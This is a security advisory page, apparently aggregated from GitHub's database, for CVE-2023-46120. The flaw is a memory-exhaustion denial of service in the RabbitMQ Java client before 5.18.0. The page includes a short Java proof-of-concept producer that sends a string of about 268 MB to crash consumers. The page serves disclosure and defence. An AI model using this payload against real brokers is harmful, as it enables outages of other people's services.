Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS1tbThoLTg1ODctcDQ2aM4AA2oL

RabbitMQ Java client's Lack of Message Size Limitation leads to Remote DoS Attack

Summary

maxBodyLebgth was not used when receiving Message objects. Attackers could just send a very large Message causing a memory overflow and triggering an OOM Error.

PoC

RbbitMQ

Producer


package org.springframework.amqp.helloworld; 

import org.springframework.amqp.core.AmqpTemplate; 
import org.springframework.context.ApplicationContext; 
import org.springframework.context.annotation.AnnotationConfigApplicationContext; 

public class Producer {
    public static void main(String[] args) {
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class); 
        String s = "A";
        for(int i=0;i<28;++i){
            s = s + s;
            System.out.println(i);
        }
        amqpTemplate.convertAndSend(s);
        System.out.println("Send Finish");
    }
 }

Consumer

package org.springframework.amqp.helloworld;

import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.amqp.core.Message;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;

public class Consumer {
    
    public static void main(String[] args) {
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
        Object o = amqpTemplate.receiveAndConvert();
        if(o != null){
            String s = o.toString();
            System.out.println("Received Length : " + s.length());
        }else{
            System.out.println("null");
        }
    }
}

Results

Impact

Users of RabbitMQ may suffer from DoS attacks from RabbitMQ Java client which will ultimately exhaust the memory of the consumer.

Permalink: https://github.com/advisories/GHSA-mm8h-8587-p46h
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tbThoLTg1ODctcDQ2aM4AA2oL
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 1 year ago
Updated: about 1 year ago


CVSS Score: 4.9
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

EPSS Percentage: 0.00363
EPSS Percentile: 0.73104

Identifiers: GHSA-mm8h-8587-p46h, CVE-2023-46120
References: Repository: https://github.com/rabbitmq/rabbitmq-java-client
Blast Radius: 19.9

Affected Packages

maven:com.rabbitmq:amqp-client
Dependent packages: 892
Dependent repositories: 11,254
Downloads:
Affected Version Ranges: < 5.18.0
Fixed in: 5.18.0
All affected versions: 1.7.2, 1.8.0, 1.8.1, 2.0.0, 2.1.0, 2.1.1, 2.2.0, 2.3.0, 2.3.1, 2.4.1, 2.5.0, 2.5.1, 2.6.0, 2.6.1, 2.7.0, 2.7.1, 2.8.0, 2.8.1, 2.8.2, 2.8.3, 2.8.4, 2.8.5, 2.8.6, 2.8.7, 3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4, 3.1.0, 3.1.1, 3.1.2, 3.1.3, 3.1.4, 3.2.0, 3.2.1, 3.2.2, 3.2.3, 3.2.4, 3.3.0, 3.3.1, 3.3.2, 3.3.3, 3.3.4, 3.3.5, 3.4.0, 3.4.1, 3.4.2, 3.4.3, 3.4.4, 3.5.0, 3.5.1, 3.5.2, 3.5.3, 3.5.4, 3.5.5, 3.5.6, 3.5.7, 3.6.0, 3.6.1, 3.6.2, 3.6.3, 3.6.4, 3.6.5, 3.6.6, 4.0.0, 4.0.1, 4.0.2, 4.0.3, 4.1.0, 4.1.1, 4.2.0, 4.2.1, 4.2.2, 4.3.0, 4.4.0, 4.4.1, 4.4.2, 4.5.0, 4.6.0, 4.7.0, 4.8.0, 4.8.1, 4.8.2, 4.8.3, 4.9.0, 4.9.1, 4.9.2, 4.9.3, 4.10.0, 4.11.0, 4.11.1, 4.11.2, 4.11.3, 4.12.0, 5.0.0, 5.1.0, 5.1.1, 5.1.2, 5.2.0, 5.3.0, 5.4.0, 5.4.1, 5.4.2, 5.4.3, 5.5.0, 5.5.1, 5.5.2, 5.5.3, 5.6.0, 5.7.0, 5.7.1, 5.7.2, 5.7.3, 5.8.0, 5.9.0, 5.10.0, 5.11.0, 5.12.0, 5.13.0, 5.13.1, 5.14.0, 5.14.1, 5.14.2, 5.14.3, 5.15.0, 5.16.0, 5.16.1, 5.17.0, 5.17.1
All unaffected versions: 5.18.0, 5.19.0, 5.20.0, 5.21.0, 5.22.0, 5.23.0